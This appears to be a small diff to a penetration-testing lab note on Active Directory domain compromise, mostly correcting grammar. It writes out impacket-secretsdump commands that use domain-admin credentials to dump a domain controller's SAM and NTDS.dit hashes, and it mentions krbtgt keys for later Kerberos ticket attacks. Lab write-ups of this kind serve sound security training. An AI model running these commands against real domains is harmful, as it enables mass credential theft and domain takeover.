Ju-On/Offensive-Security/Attacking AD 4: Domain Compromise.md

 example:

-    impacket-secretsdump / secretsdump 'impacket-secretsdump MARVEL.local/pparker:'Password1'@192.168.64.139 -just-dc-ntlm
+    impacket-secretsdump / secretsdump - impacket-secretsdump MARVEL.local/pparker:'Password1'@192.168.64.139 -just-dc-ntlm

-using our malicious domain admin account hawkeye against the DC, we succesfully dump the local SAM and more importantly NTDS.dit file.
+using our malicious domain admin account hawkeye against the DC, we succesfully dumped the local SAM and more importantly the NTDS.dit file.
 From the dump we also see 'kerberos keys' and also the krbtgt which could be later leveraged in a kerberos ticket attack.

     impacket-secretsdump MARVEL.local/hawkeye:'Password1@'@192.168.64.138